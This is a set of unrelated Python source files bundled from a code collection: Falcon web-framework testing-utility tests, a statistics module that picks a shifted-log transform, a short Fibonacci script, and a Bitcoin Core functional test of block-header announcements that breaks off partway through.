assert falcon.get_http_status(123, 'Go Away') == '123 Go Away'
@pytest.mark.parametrize(
'protocol,method',
zip(
['https'] * len(falcon.HTTP_METHODS) + ['http'] * len(falcon.HTTP_METHODS),
falcon.HTTP_METHODS * 2
)
)
def test_simulate_request_protocol(protocol, method):
sink_called = [False]
def sink(req, resp):
sink_called[0] = True
assert req.protocol == protocol
app = falcon.API()
app.add_sink(sink, '/test')
client = testing.TestClient(app)
try:
simulate = client.getattr('simulate_' + method.lower())
simulate('/test', protocol=protocol)
assert sink_called[0]
except AttributeError:
# NOTE(kgriffs): simulate_* helpers do not exist for all methods
pass
@pytest.mark.parametrize('simulate', [
testing.simulate_get,
testing.simulate_head,
testing.simulate_post,
testing.simulate_put,
testing.simulate_options,
testing.simulate_patch,
testing.simulate_delete,
])
def test_simulate_free_functions(simulate):
sink_called = [False]
def sink(req, resp):
sink_called[0] = True
app = falcon.API()
app.add_sink(sink, '/test')
simulate(app, '/test')
assert sink_called[0]
class TestFalconTestingUtils(object):
"""Verify some branches not covered elsewhere."""
def test_path_escape_chars_in_create_environ(self):
env = testing.create_environ('/hello%20world%21')
assert env['PATH_INFO'] == '/hello world!'
def test_no_prefix_allowed_for_query_strings_in_create_environ(self):
with pytest.raises(ValueError):
testing.create_environ(query_string='?foo=bar')
@pytest.mark.skipif(compat.PY3, reason='Test does not apply to Py3K')
def test_unicode_path_in_create_environ(self):
env = testing.create_environ(u'/fancy/unícode')
assert env['PATH_INFO'] == '/fancy/un\xc3\xadcode'
env = testing.create_environ(u'/simple')
assert env['PATH_INFO'] == '/simple'
def test_none_header_value_in_create_environ(self):
env = testing.create_environ('/', headers={'X-Foo': None})
assert env['HTTP_X_FOO'] == ''
def test_decode_empty_result(self):
app = falcon.API()
client = testing.TestClient(app)
response = client.simulate_request(path='/')
assert response.text == ''
def test_httpnow_alias_for_backwards_compat(self):
assert testing.httpnow is util.http_now
def test_default_headers(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
headers = {
'Authorization': 'Bearer 123',
}
client = testing.TestClient(app, headers=headers)
client.simulate_get()
assert resource.captured_req.auth == headers['Authorization']
client.simulate_get(headers=None)
assert resource.captured_req.auth == headers['Authorization']
def test_default_headers_with_override(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
override_before = 'something-something'
override_after = 'something-something'[::-1]
headers = {
'Authorization': 'Bearer XYZ',
'Accept': 'application/vnd.siren+json',
'X-Override-Me': override_before,
}
client = testing.TestClient(app, headers=headers)
client.simulate_get(headers={'X-Override-Me': override_after})
assert resource.captured_req.auth == headers['Authorization']
assert resource.captured_req.accept == headers['Accept']
assert resource.captured_req.get_header('X-Override-Me') == override_after
def test_status(self):
app = falcon.API()
resource = testing.SimpleTestResource(status=falcon.HTTP_702)
app.add_route('/', resource)
client = testing.TestClient(app)
result = client.simulate_get()
assert result.status == falcon.HTTP_702
def test_wsgi_iterable_not_closeable(self):
result = testing.Result([], falcon.HTTP_200, [])
assert not result.content
assert result.json is None
def test_path_must_start_with_slash(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get('foo')
def test_cached_text_in_result(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource(body='test'))
client = testing.TestClient(app)
result = client.simulate_get()
assert result.text == result.text
def test_simple_resource_body_json_xor(self):
with pytest.raises(ValueError):
testing.SimpleTestResource(body='', json={})
def test_query_string(self):
class SomeResource(object):
def on_get(self, req, resp):
doc = {}
doc['oid'] = req.get_param_as_int('oid')
doc['detailed'] = req.get_param_as_bool('detailed')
doc['things'] = req.get_param_as_list('things', int)
doc['query_string'] = req.query_string
resp.body = json.dumps(doc)
app = falcon.API()
app.req_options.auto_parse_qs_csv = True
app.add_route('/', SomeResource())
client = testing.TestClient(app)
result = client.simulate_get(query_string='oid=42&detailed=no&things=1')
assert result.json['oid'] == 42
assert not result.json['detailed']
assert result.json['things'] == [1]
params = {'oid': 42, 'detailed': False}
result = client.simulate_get(params=params)
assert result.json['oid'] == params['oid']
assert not result.json['detailed']
assert result.json['things'] is None
params = {'oid': 1978, 'detailed': 'yes', 'things': [1, 2, 3]}
result = client.simulate_get(params=params)
assert result.json['oid'] == params['oid']
assert result.json['detailed']
assert result.json['things'] == params['things']
expected_qs = 'things=1,2,3'
result = client.simulate_get(params={'things': [1, 2, 3]})
assert result.json['query_string'] == expected_qs
expected_qs = 'things=1&things=2&things=3'
result = client.simulate_get(params={'things': [1, 2, 3]},
params_csv=False)
assert result.json['query_string'] == expected_qs
def test_query_string_no_question(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get(query_string='?x=1')
def test_query_string_in_path(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get(path='/thing?x=1')
@pytest.mark.parametrize('document', [
# NOTE(vytas): using an exact binary fraction here to avoid special
# code branch for approximate equality as it is not the focus here
16.0625,
123456789,
True,
'',
u'I am a \u1d0a\ua731\u1d0f\u0274 string.',
[1, 3, 3, 7],
{u'message': u'\xa1Hello Unicode! \U0001F638'},
{
'count': 4,
'items': [
{'number': 'one'},
{'number': 'two'},
{'number': 'three'},
{'number': 'four'},
],
'next': None,
},
])
def test_simulate_json_body(self, document):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
json_types = ('application/json', 'application/json; charset=UTF-8')
client = testing.TestClient(app)
client.simulate_post('/', json=document)
captured_body = resource.captured_req.stream.read().decode('utf-8')
assert json.loads(captured_body) == document
assert resource.captured_req.content_type in json_types
headers = {
'Content-Type': 'x-falcon/peregrine',
'X-Falcon-Type': 'peregrine',
}
body = 'If provided, `json` parameter overrides `body`.'
client.simulate_post('/', headers=headers, body=body, json=document)
assert resource.captured_req.media == document
assert resource.captured_req.content_type in json_types
assert resource.captured_req.get_header('X-Falcon-Type') == 'peregrine'
@pytest.mark.parametrize('remote_addr', [
None,
'127.0.0.1',
'8.8.8.8',
'104.24.101.85',
'2606:4700:30::6818:6455',
])
def test_simulate_remote_addr(self, remote_addr):
class ShowMyIPResource(object):
def on_get(self, req, resp):
resp.body = req.remote_addr
resp.content_type = falcon.MEDIA_TEXT
app = falcon.API()
app.add_route('/', ShowMyIPResource())
client = testing.TestClient(app)
resp = client.simulate_get('/', remote_addr=remote_addr)
assert resp.status_code == 200
if remote_addr is None:
assert resp.text == '127.0.0.1'
else:
assert resp.text == remote_addr
def test_simulate_hostname(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
client = testing.TestClient(app)
client.simulate_get('/', protocol='https',
host='falcon.readthedocs.io')
assert resource.captured_req.uri == 'https://falcon.readthedocs.io/'
@pytest.mark.parametrize('extras,expected_headers', [
(
{},
(('user-agent', 'curl/7.24.0 (x86_64-apple-darwin12.0)'),),
),
(
{'HTTP_USER_AGENT': 'URL/Emacs', 'HTTP_X_FALCON': 'peregrine'},
(('user-agent', 'URL/Emacs'), ('x-falcon', 'peregrine')),
),
])
def test_simulate_with_environ_extras(self, extras, expected_headers):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
client = testing.TestClient(app)
client.simulate_get('/', extras=extras)
for header, value in expected_headers:
assert resource.captured_req.get_header(header) == value
def test_override_method_with_extras(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource(body='test'))
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get('/', extras={'REQUEST_METHOD': 'PATCH'})
resp = client.simulate_get('/', extras={'REQUEST_METHOD': 'GET'})
assert resp.status_code == 200
assert resp.text == 'test'
class TestNoApiClass(testing.TestCase):
def test_something(self):
self.assertTrue(isinstance(self.app, falcon.API))
class TestSetupApi(testing.TestCase):
def setUp(self):
super(TestSetupApi, self).setUp()
self.api = falcon.API()
def test_something(self):
self.assertTrue(isinstance(self.api, falcon.API))
|
the-stack_106_22076
|
import scipy.stats
import numpy as np
from numpy import sign, abs, exp, log, pi, sqrt
from numpy import nanmean as mean, nanstd as std, nanmedian as median, nanmin as min, nanmax as max
# .95 quantile of Extreme Value Distribution
_gumble_p95 = scipy.stats.gumbel_l.ppf(.95)
def _skew(vector):
return scipy.stats.skew(vector, nan_policy='omit')
def _andersondarling(vector):
"Compute Anderson Darling statistic of given vector"
vector = vector[~np.isnan(vector)] # remove nans
n = len(vector)
if n < 7:
raise ValueError('Anderson Darling statistic requires at least 7 non-NAs')
vector = np.sort(vector)
f = scipy.stats.norm.cdf(vector, mean(vector), std(vector, ddof=1))
i = np.arange(1, n+1)
S = sum((2*i - 1)/n * (log(f) + log(1-np.flip(f))))
return -n-S
def _winsorize(vector):
"Winsorize based on 95th percentile of extreme value distribution"
n = np.count_nonzero(~np.isnan(vector))
gumble_p95 = _gumble_p95 # cache this call for speed
a_n = (2*log(n))**(-0.5)
b_n = (2*log(n) - log(log(n)) - log(4*pi))**0.5
threshold = gumble_p95 * a_n + b_n
# TODO: Warnings are issued here when vector contains nans.
vector[vector > threshold] = threshold
vector[vector < -threshold] = -threshold
return vector
def _get_data_range(vector):
IQR = scipy.stats.iqr(vector, nan_policy='omit')
# TODO: Scipy computes IQR slightly differently
# from MATLAB. This leads to slightly different
# results from Marron's version
if IQR == 0:
data_range = max(vector) - min(vector)
else:
data_range = IQR
return data_range
def _shiftedlog(vector, shift, _data_range=None):
"Apply shifted log transformation with the given shift"
beta = sign(shift) * (exp(abs(shift))-1)
if _data_range is not None:
data_range = _data_range
else:
data_range = _get_data_range(vector)
# Transform data based on sign of beta
if beta == 0:
vector = vector
elif beta > 0:
alpha = abs(1.0/beta)
vector = log(vector - min(vector) + alpha*data_range)
else:
alpha = abs(1.0/beta)
vector = -log(max(vector) - vector + alpha*data_range)
vector_median = median(vector)
MAD = mean(abs(vector - vector_median)) * sqrt(pi / 2)
if MAD == 0:
# if the MAD is 0, just return zeroes but retain nans.
vector[~np.isnan(vector)] = 0
return vector
vector = (vector - vector_median) / MAD
vector = _winsorize(vector)
vector = (vector - mean(vector)) / std(vector, ddof=1)
return vector
def autoshiftedlog(vector, score_function='Anderson Darling', verbose=False):
"""Apply shifted log transformation, automatically selecting the best shift
based on desired score function.
vector: a numpy array or pandas Series
score_function: 'Anderson Darling' or 'skewness'
verbose: if True, prints the optimal value of beta
"""
if score_function == 'Anderson Darling':
score = _andersondarling
elif score_function == 'skewness':
score = _skew
else:
raise ValueError("metric must be 'Anderson Darling' or 'skewness'")
if std(vector) == 0:
# if the SD is 0, just return zeroes but retain nans.
vector[~np.isnan(vector)] = 0
return vector
data_range = _get_data_range(vector) # computing this in advance speeds up the search
# Set up an array of possible shift values to try
if _skew(vector) > 0:
shifts = np.arange(0.0, 9.0, step=0.01)
else:
shifts = -np.arange(0.0, 9.0, step=0.01)
# Find the shift that minimizes the desired score function
scores = [score(_shiftedlog(vector, s, data_range)) for s in shifts]
minimizing_index = np.argmin(scores)
best_shift = shifts[minimizing_index]
best_transformation = _shiftedlog(vector, best_shift, data_range)
if verbose:
best_beta = sign(best_shift) * (exp(abs(best_shift))-1)
print("Transformation parameter beta: {}".format(best_beta))
return best_transformation
|
the-stack_106_22077
|
# Fibonacci tool
# This script only works with Python3!
import time
def getFibonacciIterative(n: int) -> int:
"""
Calculate the fibonacci number at position n iteratively
"""
a = 0
b = 1
for i in range(n):
a, b = b, a + b
return a
def getFibonacciRecursive(n: int) -> int:
"""
Calculate the fibonacci number at position n recursively
"""
a = 0
b = 1
def step(n: int) -> int:
nonlocal a, b
if n <= 0:
return a
a, b = b, a + b
return step(n - 1)
return step(n)
def getFibonacciDynamic(n: int,fib: list) -> int:
'''
Calculate the fibonacci number at position n using dynamic programming to improve runtime
'''
if n==0 or n==1:
return n
if fib[n]!=-1:
return fib[n]
fib[n]=getFibonacciDynamic(n-1,fib)+getFibonacciDynamic(n-2,fib)
return fib[n]
def main():
n=int(input())
fib=[-1]*n
getFibonacciDynamic(n,fib)
def compareFibonacciCalculators(n: int) -> None:
"""
Interactively compare both fibonacci generators
"""
startI = time.clock()
resultI = getFibonacciIterative(n)
endI = time.clock()
startR = time.clock()
resultR = getFibonacciRecursive(n)
endR = time.clock()
s = "{} calculting {} => {} in {} seconds"
print(s.format(
"Iteratively", n, resultI, endI - startI
))
print(s.format(
"Recursively", n, resultR, endR - startR
))
# Or we can use the following
nterms = int(input("How many terms? "))
# first two terms
n1, n2 = 0, 1
count = 0
# check if the number of terms is valid
if nterms <= 0:
print("Please enter a positive integer")
elif nterms == 1:
print("Fibonacci sequence upto",nterms,":")
print(n1)
else:
print("Fibonacci sequence:")
while count < nterms:
print(n1)
nth = n1 + n2
# update values
n1 = n2
n2 = nth
count += 1
print("End of code.")
|
the-stack_106_22078
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test behavior of headers messages to announce blocks.
Setup:
- Two nodes:
- node0 is the node-under-test. We create two p2p connections to it. The
first p2p connection is a control and should only ever receive inv's. The
second p2p connection tests the headers sending logic.
- node1 is used to create reorgs.
test_null_locators
==================
Sends two getheaders requests with null locator values. First request's hashstop
value refers to validated block, while second request's hashstop value refers to
a block which hasn't been validated. Verifies only the first request returns
headers.
test_nonnull_locators
=====================
Part 1: No headers announcements before "sendheaders"
a. node mines a block [expect: inv]
send getdata for the block [expect: block]
b. node mines another block [expect: inv]
send getheaders and getdata [expect: headers, then block]
c. node mines another block [expect: inv]
peer mines a block, announces with header [expect: getdata]
d. node mines another block [expect: inv]
Part 2: After "sendheaders", headers announcements should generally work.
a. peer sends sendheaders [expect: no response]
peer sends getheaders with current tip [expect: no response]
b. node mines a block [expect: tip header]
c. for N in 1, ..., 10:
* for announce-type in {inv, header}
- peer mines N blocks, announces with announce-type
[ expect: getheaders/getdata or getdata, deliver block(s) ]
- node mines a block [ expect: 1 header ]
Part 3: Headers announcements stop after large reorg and resume after getheaders or inv from peer.
- For response-type in {inv, getheaders}
* node mines a 7 block reorg [ expect: headers announcement of 8 blocks ]
* node mines an 8-block reorg [ expect: inv at tip ]
* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
Part 5: Test handling of headers that don't connect.
a. Repeat 10 times:
1. Announce a header that doesn't connect.
Expect: getheaders message
2. Send headers chain.
Expect: getdata for the missing blocks, tip update.
b. Then send 9 more headers that don't connect.
Expect: getheaders message each time.
c. Announce a header that does connect.
Expect: no response.
d. Announce 49 headers that don't connect.
Expect: getheaders message each time.
e. Announce one more that doesn't connect.
Expect: disconnect.
"""
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import CInv
from test_framework.mininode import (
CBlockHeader,
NODE_WITNESS,
P2PInterface,
mininode_lock,
msg_block,
msg_getblocks,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_sendheaders,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
sync_blocks,
wait_until,
)
DIRECT_FETCH_RESPONSE_TIME = 0.05
class BaseNode(P2PInterface):
def __init__(self):
super().__init__()
self.block_announced = False
self.last_blockhash_announced = None
self.recent_headers_announced = []
def send_get_data(self, block_hashes):
"""Request data for a list of block hashes."""
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.send_message(msg)
def send_get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.send_message(msg)
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [CBlockHeader(b) for b in new_blocks]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: "getdata" in self.last_message and [x.hash for x in self.last_message["getdata"].inv] == hash_list
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def wait_for_block_announcement(self, block_hash, timeout=60):
test_function = lambda: self.last_blockhash_announced == block_hash
wait_until(test_function, timeout=timeout, lock=mininode_lock)
def on_inv(self, message):
self.block_announced = True
self.last_blockhash_announced = message.inv[-1].hash
def on_headers(self, message):
if len(message.headers):
self.block_announced = True
for x in message.headers:
x.calc_sha256()
# append because headers may be announced over multiple messages.
self.recent_headers_announced.append(x.sha256)
self.last_blockhash_announced = message.headers[-1].sha256
def clear_block_announcements(self):
with mininode_lock:
self.block_announced = False
self.last_message.pop("inv", None)
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_headers_announcement(self, headers):
"""Test whether the last headers announcements received are right.
Headers may be announced across more than one message."""
test_function = lambda: (len(self.recent_headers_announced) >= len(headers))
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
assert_equal(self.recent_headers_announced, headers)
self.block_announced = False
self.last_message.pop("headers", None)
self.recent_headers_announced = []
def check_last_inv_announcement(self, inv):
"""Test whether the last announcement received had the right inv.
inv should be a list of block hashes."""
test_function = lambda: self.block_announced
wait_until(test_function, timeout=60, lock=mininode_lock)
with mininode_lock:
compare_inv = []
if "inv" in self.last_message:
compare_inv = [x.hash for x in self.last_message["inv"].inv]
assert_equal(compare_inv, inv)
self.block_announced = False
self.last_message.pop("inv", None)
class SendHeadersTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def mine_blocks(self, count):
"""Mine count blocks and return the new tip."""
# Clear out block announcements from each p2p listener
[x.clear_block_announcements() for x in self.nodes[0].p2ps]
self.nodes[0].generatetoaddress(count, self.nodes[0].get_deterministic_priv_key().address)
return int(self.nodes[0].getbestblockhash(), 16)
def mine_reorg(self, length):
"""Mine a reorg that invalidates length blocks (replacing them with # length+1 blocks).
Note: we clear the state of our p2p connections after the
to-be-reorged-out blocks are mined, so that we don't break later tests.
return the list of block hashes newly mined."""
# make sure all invalidated blocks are node0's
self.nodes[0].generatetoaddress(length, self.nodes[0].get_deterministic_priv_key().address)
sync_blocks(self.nodes, wait=0.1)
for x in self.nodes[0].p2ps:
x.wait_for_block_announcement(int(self.nodes[0].getbestblockhash(), 16))
x.clear_block_announcements()
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height - (length - 1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generatetoaddress(length + 1, self.nodes[1].get_deterministic_priv_key().address) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
def run_test(self):
# Setup the p2p connections
inv_node = self.nodes[0].add_p2p_connection(BaseNode())
# Make sure NODE_NETWORK is not set for test_node, so no block download
# will occur outside of direct fetching
test_node = self.nodes[0].add_p2p_connection(BaseNode(), services=NODE_WITNESS)
# Ensure verack's have been processed by our peer
inv_node.sync_with_ping()
test_node.sync_with_ping()
self.test_null_locators(test_node, inv_node)
self.test_nonnull_locators(test_node, inv_node)
def test_null_locators(self, test_node, inv_node):
tip = self.nodes[0].getblockheader(self.nodes[0].generatetoaddress(1, self.nodes[0].get_deterministic_priv_key().address)[0])
tip_hash = int(tip["hash"], 16)
inv_node.check_last_inv_announcement(inv=[tip_hash])
test_node.check_last_inv_announcement(inv=[tip_hash])
self.log.info("Verify getheaders with null locator and valid hashstop returns headers.")
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=tip_hash)
test_node.check_last_headers_announcement(headers=[tip_hash])
self.log.info("Verify getheaders with null locator and invalid hashstop does not return headers.")
block = create_block(int(tip["hash"], 16), create_coinbase(tip["height"] + 1), tip["mediantime"] + 1)
block.nVersion = 0x20000000
block.solve()
test_node.send_header_for_blocks([block])
test_node.clear_block_announcements()
test_node.send_get_headers(locator=[], hashstop=int(block.hash, 16))
test_node.sync_with_ping()
assert_equal(test_node.block_announced, False)
inv_node.clear_block_announcements()
test_node.send_message(msg_block(block))
inv_node.check_last_inv_announcement(inv=[int(block.hash, 16)])
def test_nonnull_locators(self, test_node, inv_node):
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
self.log.info("Part 1: headers don't start before sendheaders message...")
for i in range(4):
self.log.debug("Part 1.{}: starting...".format(i))
old_tip = tip
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# next try requesting header and block
test_node.send_get_headers(locator=[old_tip], hashstop=tip)
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_block_announcements() # since we requested headers...
elif i == 2:
# this time announce own block via headers
inv_node.clear_block_announcements()
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height + 1), block_time)
new_block.nVersion = 0x20000000
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256])
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
wait_until(lambda: inv_node.block_announced, timeout=60, lock=mininode_lock)
inv_node.clear_block_announcements()
test_node.clear_block_announcements()
self.log.info("Part 1: success!")
self.log.info("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.send_get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height = self.nodes[0].getblockcount() + 1
block_time += 10 # Advance far enough ahead
for i in range(10):
self.log.debug("Part 2.{}: starting...".format(i))
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
self.log.debug("Part 2.{}.{}: starting...".format(i, j))
blocks = []
for b in range(i + 1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getheaders()
# Should have received a getheaders now
test_node.send_header_for_blocks(blocks)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
[inv_node.send_block_inv(x.sha256) for x in blocks]
test_node.wait_for_getdata([x.sha256 for x in blocks])
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert "inv" not in inv_node.last_message
assert "headers" not in inv_node.last_message
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
height += 1
block_time += 1
self.log.info("Part 2: success!")
self.log.info("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
self.log.debug("Part 3.{}: starting...".format(j))
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=new_block_hashes)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
block_time += 9
fork_point = self.nodes[0].getblock("%064x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator=[fork_point])
test_node.check_last_inv_announcement(inv=new_block_hashes)
test_node.send_get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
self.log.debug("Part 3.{}.{}: starting...".format(j, i))
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_inv_announcement(inv=[tip])
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.send_get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
test_node.send_get_data([tip])
test_node.wait_for_block(tip)
if j == 0:
test_node.send_get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
inv_node.check_last_inv_announcement(inv=[tip])
test_node.check_last_headers_announcement(headers=[tip])
self.log.info("Part 3: success!")
self.log.info("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert "getdata" not in test_node.last_message
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=DIRECT_FETCH_RESPONSE_TIME)
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 2
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=DIRECT_FETCH_RESPONSE_TIME)
# Announcing 1 more header should not trigger any response
test_node.last_message.pop("getdata", None)
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert "getdata" not in test_node.last_message
self.log.info("Part 4: success!")
# Now deliver all those blocks we announced.
[test_node.send_message(msg_block(x)) for x in blocks]
self.log.info("Part 5: Testing handling of unconnecting headers")
# First we test that receipt of an unconnecting header doesn't prevent
# chain sync.
for i in range(10):
self.log.debug("Part 5.{}: starting...".format(i))
test_node.last_message.pop("getdata", None)
blocks = []
# Create two more blocks.
for j in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].nVersion = 0x20000000
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Send the header of the second block -> this won't connect.
with mininode_lock:
test_node.last_message.pop("getheaders", None)
test_node.send_header_for_blocks([blocks[1]])
test_node.wait_for_getheaders()
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks])
[test_node.send_message(msg_block(x)) for x in blocks]
test_node.sync_with_ping()
